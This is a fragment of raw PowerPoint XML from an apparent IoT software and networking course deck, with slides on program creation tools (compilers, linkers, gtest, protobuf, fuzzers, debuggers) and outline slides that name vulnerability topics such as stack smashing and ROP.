        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8305403" y="3504803"/>
            <a:ext cx="76200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7123906" y="3771106"/>
            <a:ext cx="2286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bwMode="auto">
          <a:xfrm>
            <a:off x="9296400" y="1676400"/>
            <a:ext cx="11430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OS tcService</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Straight Connector 41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9768443" y="2377043"/>
            <a:ext cx="27432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bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="4648200"/>
            <a:ext cx="4191000" cy="6096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Hardware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="228599"/>
            <a:ext cx="11684000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>What’s next</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13939879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26255"/>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5, program creation and vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734290" y="1870365"/>
            <a:ext cx="10998051" cy="498449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Program creation and its discontents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Compilers, assemblers and linkers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Repositories and testing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Encapsulating data</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The dark side of computer software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Vulnerabilities based on programming flaws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Kernel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Protocol vulnerabilities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Anatomy of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Protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4036275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9" y="113983"/>
            <a:ext cx="11640064" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software security: program creation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711423" y="1692911"/>
            <a:ext cx="10769153"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Compilers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Convert high level languages (like C++) to assembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Question: How do we know code is faithful translation? How do we know the compiler has no back door?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Assemblers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Assembler convert assembly code into “object files” - binary code with relocation information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Linkers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Links object files by satisfying all references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Often references are to standard libraries (like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>).  Libraries can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>statically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> linked or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>dynamically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> linked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How do we know library code is “safe”?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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21855545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Development tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362143" y="1470454"/>
            <a:ext cx="11582400" cy="5251022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Repositories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Keeps record of design, test and code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>State of ”then current” repository recoverable throughout its history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Developer submitting changes recorded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Code review information also recorded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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github tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, public repositories at www.github.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>gtest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> for automating tests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Most serious developers require tests run and succeed before any checkin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>When I was at Google, you couldn’t check in code without a serious code review as well as comprehensive tests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>protobuf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Flexible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> to develop serialization and deserialization code for structured messages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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4408442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 y="113983"/>
            <a:ext cx="11900591" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Development tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404688" y="2272145"/>
            <a:ext cx="11582400" cy="4116546"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Fuzzers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Tool to discover vulnerabilities validating input arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Debuggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Tools to step through programs and debug them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Simulators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Programs that simulate program execution in virtual environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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Qemu simulator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41230357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358912"/>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6, control hijacking vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539545" y="2342527"/>
            <a:ext cx="11112910" cy="4156561"/>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Anatomy of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Command line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Authentication and authorization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Protocol vulnerabilities: authentication and authorization</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Control hijacking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Stacks and stack smashing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Heap based attacks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ROP</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Overflows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Double free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3374582947"/>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0000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F3F2EF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="CC0000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="56555A"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="009192"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="E2E1DE"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="CC0000"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="56555A"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="021130"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="00919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8741</TotalTime>
  <Words>19017</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>2525</Paragraphs>
  <Slides>184</Slides>
  <Notes>157</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184</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="199" baseType="lpstr">
      <vt:lpstr>Math1Mono</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Retrospect</vt:lpstr>
      <vt:lpstr>Clip</vt:lpstr>
      <vt:lpstr>Internet of Things: Software and Networking</vt:lpstr>
      <vt:lpstr>Guide</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Software and networking part 1, general advice and booting</vt:lpstr>
      <vt:lpstr>Booting an IoT device (Raspberry Pi) </vt:lpstr>
      <vt:lpstr>Early initialization and u-boot</vt:lpstr>
      <vt:lpstr>Raspberry Pi detailed boot: hardware</vt:lpstr>
      <vt:lpstr>Raspberry Pi detailed boot: hardware</vt:lpstr>
      <vt:lpstr>Block storage partitions</vt:lpstr>
      <vt:lpstr>Typical IoT memory layout</vt:lpstr>
      <vt:lpstr>Linux boot</vt:lpstr>
      <vt:lpstr>IoT update</vt:lpstr>
      <vt:lpstr>IoT archive formats</vt:lpstr>
      <vt:lpstr>Software and networking part 2: system software</vt:lpstr>
      <vt:lpstr>What’s an operating system</vt:lpstr>
      <vt:lpstr>Modes, interrupts and exceptions</vt:lpstr>
      <vt:lpstr>Processes and threads</vt:lpstr>
      <vt:lpstr>Memory</vt:lpstr>
      <vt:lpstr>I/O Devices</vt:lpstr>
      <vt:lpstr>Modifying kernels: device drivers</vt:lpstr>
      <vt:lpstr>Authentication, authorization and accounts</vt:lpstr>
      <vt:lpstr>File systems</vt:lpstr>
      <vt:lpstr>Synchronization primitives and basic services</vt:lpstr>
      <vt:lpstr>Operating system layering</vt:lpstr>
      <vt:lpstr>Hypervisors</vt:lpstr>
      <vt:lpstr>Non-kernel components</vt:lpstr>
      <vt:lpstr>Configuration files</vt:lpstr>
      <vt:lpstr>Linux configuration</vt:lpstr>
      <vt:lpstr>Linux configuration</vt:lpstr>
      <vt:lpstr>Linux configuration</vt:lpstr>
      <vt:lpstr>Linux configuration</vt:lpstr>
      <vt:lpstr>Logs</vt:lpstr>
      <vt:lpstr>Software and networking part 3, computer networking</vt:lpstr>
      <vt:lpstr>Computer networking</vt:lpstr>
      <vt:lpstr>Packet switching and network topology</vt:lpstr>
      <vt:lpstr>Layer Model for Network Services</vt:lpstr>
      <vt:lpstr>Internet Physical Infrastructure</vt:lpstr>
      <vt:lpstr>Computer networking: important protocols</vt:lpstr>
      <vt:lpstr>Inter-networking Protocols</vt:lpstr>
      <vt:lpstr>Routing and interposition of network</vt:lpstr>
      <vt:lpstr>Routing from A-Z: Addresses</vt:lpstr>
      <vt:lpstr>Routing from A-Z: Things can change</vt:lpstr>
      <vt:lpstr>Routing from A-Z: who says what</vt:lpstr>
